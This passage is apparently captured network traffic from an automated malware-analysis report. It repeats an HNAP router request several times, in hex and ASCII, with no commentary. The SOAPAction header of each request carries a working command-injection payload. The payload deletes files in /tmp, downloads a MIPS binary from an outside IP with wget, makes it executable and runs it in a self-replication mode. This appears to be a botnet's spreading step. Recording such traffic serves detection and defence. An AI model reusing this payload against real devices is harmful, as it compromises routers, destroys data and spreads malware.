6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
